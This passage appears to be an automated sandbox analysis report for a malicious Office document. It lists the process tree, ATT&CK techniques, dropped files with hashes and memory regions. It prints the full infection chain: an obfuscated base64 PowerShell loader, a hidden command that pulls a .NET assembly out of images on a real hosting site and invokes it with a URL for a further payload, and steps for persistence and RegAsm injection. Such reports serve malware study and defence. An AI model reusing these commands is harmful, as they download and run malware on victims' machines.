reDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBDDgTreFYDgTreUgDgTrevDgTreDDgTreDgTreMDgTreDgTrexDgTreC8DgTreODgTreDgTrexDgTreDIDgTreLgDgTre1DgTreDkDgTreLgDgTrezDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFIDgTreVgBDDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CVR/001/812.59.3.291//:ptth' , '1' , 'C:\ProgramData\' , 'RVC','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\RVC.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:2732

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
77fff4010e48018b867bb350fb78b7c2

SHA1
31b0dfcc0b92a789cd5c94dbf8d0f5aca820ed31

SHA256
3e95094f49fea7951fb5ea5551a8b344c1ec16ddaf4f5da7b6bfe1151afa9ee5

SHA512
78a8fc7de1b3cbbc2225790bf55fd64b3c7fa922b4601dcbb1103cc12491da71ebae1eebfaa3a2ce2e0b3b3a7b7229dd448012c23a707f84aae8fe0e996c7e89

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
82bd7d35a6cccfa0c9560a493d7a476d

SHA1
e2e067142e6c2a9fe85b0ef35d944fc2c1ede512

SHA256
75ad42bfac58fbc83b06fc12f7072889abe45533661701d03d6fff5d412c72c8

SHA512
0055515066baa881d7d8e43201c77ce55f993f91eca9b7b18539be619f010b5fb6f415de8a272bfa2829c45b2c8dd84487c20f6b738457b17e37473246346b00

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
62ea3b5d3e7e6b07ebf85a7208ae2f35

SHA1
d9e85a4dcd003e03688fa1ca99ee7e6a88af0221

SHA256
14492ac61474cc0dc05416cd3c99ec25dc8e230cd7f05ef1288ca7dc65bc660c

SHA512
3d1aecfae7d7973c8f0bfd42928174b35b7bd3f21f2420a177a4d07560f6c93e7c12b8e526f3c52f9055131992e92a87183e265e00f86be5dd1267ea7c5bfb11

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
f4c3861d4f8beef018bc950902b3f6d1

SHA1
c60e307c03cf0eb2d9ba71b547218fd153be4154

SHA256
9edbe8e88172ab70e75ac31d24899754b6079b37e15f12f6fa2d28955f5d495c

SHA512
7e94a0a63aeddcacb1f1087f9387cde9b41ce6fe5997f66bcc2546ba14814093671a3cb3a615e0941d9ac510893f3cc6a41f203acfbc19b86bdbab9b158da7ea

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
0342e857d9030e4f438077a7ea5a2e1a

SHA1
39b5ca05a6c55134d441a0471d7d86e49eca65a4

SHA256
d92a1e206f7475d56af22a2d137916fec71c208066e191f7a3f66fd706fead52

SHA512
0b56bc3084209151cb4ef4b54562235a4b8ec401425731702d9a58d2af06a004b50609c9939011774b9fdc45f57e7e6a0a19a0367dc6f7c81ecc08d9346807c4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
2ffc38c1b841e255a0b3f1c1619ded75

SHA1
2cae1771cbd0d322d1a2e7c7cdb070d663ecb036

SHA256
fe58b90a4b27a3d7e54096354e2ae1104bba8850c3a53f455f8cbfcfc6b4ab7d

SHA512
8ae7bdaae78a0eae7d4bd1c87918de9becca4e0044ec98fc8ff1c109a6acb504cc253c6ee90b00f9a2fb6b649d13fd9eddce031c6f3061b3fc1622af94cef4df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A465D69-FCF7-4B0E-87D6-8F51B417CEE5}.FSD
Filesize
128KB

MD5
47f01023d8a933cb47f49292e949083b

SHA1
a8599ec72321123922058395a3fc077006a1801a

SHA256
fa919b36fdf28b33cd5f23938ff2891a4f73ee5b3df59626b10412bc1d210147

SHA512
62b9dde23d2067209be0514d8ce82563c6a827349e4793338cfebc9870cd7153e1b77aea225d7e4c9d3612399dce048c803c1637aff1581b29e32138001680cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
dc49be8255cc714a03642a77b904e001

SHA1
976e9e11852f04bb93f9d3c22ca3c3fd069559d7

SHA256
4a69d43ab4b02c6b175f019abbf6febcf782dc6586b142f4be160c213722cc4e

SHA512
7dddb6ac600a04adface2d3fd19a57ca8835540b49126f03502bcdc00c78262affdc33c44c6206554da481071b829005b129b668594f419145094f9b938d1add

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{424E7659-3C4F-4968-B599-4B7570C79DAC}.FSD
Filesize
128KB

MD5
c346673be0adbc48a68ee86374f20025

SHA1
5c49b6c43cf94e29065004e3835ec94caab081a9

SHA256
36e908d81dc756b832a7dfadbc9ad7643ee4b1f964a570c4f6b93f5bf0f40611

SHA512
659387c588c3f0c2dce89a10f022b71f9ff326ddf790dcb6ee88039c040b525868e615ec5ffb8729c45b21253f967b8c46989d0d07009ba445d4024b67265c25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OZ6QWH2\wetrytosexwithhertrulyfromtheheartbecausesheisverybeautigfulgirlwholikesxwthmefromtheheart___toundersadhowmuchiwantherforexsheisvey[1].doc
Filesize
71KB

MD5
28f01b474be6aeb345aaca18388a3ad6

SHA1
ca62d1a84fc88a61ab5ec5162219f847ffd4ab70

SHA256
2562b562a8f29256cf16403c893b482838edee61e631639c39a705237046d225

SHA512
6e6fb47442a111643e57167b0e181aa6299362f0d3aaefb79fe5d75338af18798229f178af9a2c25ae50ffae18c6d5eef92770a76f5e4848dc5188bbfccff2e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3342.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{927A54BE-B04A-49D3-8D5D-C136010B8606}
Filesize
128KB

MD5
613e221457a4c5e1e15585f29e99c8d2

SHA1
e656d9daa3c2b3c1b2d7495cff662a4776e80e8a

SHA256
c738280a02e17c7638b3e6180ebd44f1ebfa1c0b25b94fe424d67c4cffbba5cf

SHA512
e2947edcd891cd6525acfcd7aebe1acc2663a48f75e57051d2cbed552033e6610922eee68756f5cc77ba1249fd3bdeaf8791b9bb718bc7b9ccac56af53a004bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AH8C38A4.txt
Filesize
831B

MD5
fbae3bde06c754a4b012de51c6afd361

SHA1
3c91189db77de3e6d8290940051c789fa0b9bbfd

SHA256
63634717af4d44bcf12b9c6e902042131747d3044a5a249f39fecb91149ee2c6

SHA512
3ac0beb2c84ad7420c93b531abf0ca300a7703552322e936cf6fe53eb41a3f444aba2239c04af2f228159b67c60b45cadbe2daa49f3e8ae7a24dd412b4cc7c81

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
d5a1fddd2fe8303175521ef2cba2c47c

SHA1
2c16dad2e134f4d0f6bb6e3473908b4c5c1b3a1c

SHA256
f1281391223eeb303a461fedb31dcb5c2a2aba6e8f33813344df95729642a4a1

SHA512
f9b4580c871962bdf10363b55219e75829940fa1cdeb7bd29f4bc65aaae242de6284d76b700115b89d7042d6004201dc2ee5044b8689690a832f15cfabd8381a

Download Submit
C:\Users\Admin\AppData\Roaming\loverskissingforimage.vbs
Filesize
399KB

MD5
42351519fa2bf8b9471c118ce7d57dfd

SHA1
ba9c7fdd039f45f740f87c8f5cf0134077c9df06

SHA256
d630249c7d763545e77e9711a459127bd99a1ad4cb00d0f49f5bff575cda3b41

SHA512
afa500007c9cd1714c1e162c5aed63dfabc6870afdd22cb804ad8ffa41cb932a1af2059893ac942490bb2fece8f842eca22d3ad9f3410a8275f4c82dfce9850c

Download Submit
memory/1612-168-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-169-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/1612-265-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-239-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-237-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-244-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2580-241-0x0000000002820000-0x0000000002860000-memory.dmp

Filesize
256KB

Download
memory/2580-240-0x0000000002820000-0x0000000002860000-memory.dmp

Filesize
256KB

Download
memory/2580-238-0x0000000002820000-0x0000000002860000-memory.dmp

Filesize
256KB

Download
memory/2732-247-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-245-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-285-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-284-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-283-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-282-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-281-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-280-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-279-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-253-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-255-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-251-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-261-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-263-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-259-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2732-257-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-249-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-278-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-246-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-277-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-276-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-266-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-267-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-272-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-269-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-270-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2732-271-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2812-273-0x00000000727DD000-0x00000000727E8000-memory.dmp

Filesize
44KB

Download
memory/2812-41-0x000000002FA11000-0x000000002FA12000-memory.dmp

Filesize
4KB

Download
memory/2812-45-0x0000000003650000-0x0000000003652000-memory.dmp

Filesize
8KB

Download
memory/2812-43-0x00000000727DD000-0x00000000727E8000-memory.dmp

Filesize
44KB

Download
memory/2884-268-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2884-160-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2884-161-0x000000006A2B0000-0x000000006A85B000-memory.dmp

Filesize
5.7MB

Download
memory/2884-162-0x00000000028C0000-0x0000000002900000-memory.dmp

Filesize
256KB

Download
memory/3060-1-0x00000000727DD000-0x00000000727E8000-memory.dmp

Filesize
44KB

Download
memory/3060-46-0x0000000002410000-0x0000000002412000-memory.dmp

Filesize
8KB

Download
memory/3060-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3060-231-0x00000000727DD000-0x00000000727E8000-memory.dmp

Filesize
44KB

Download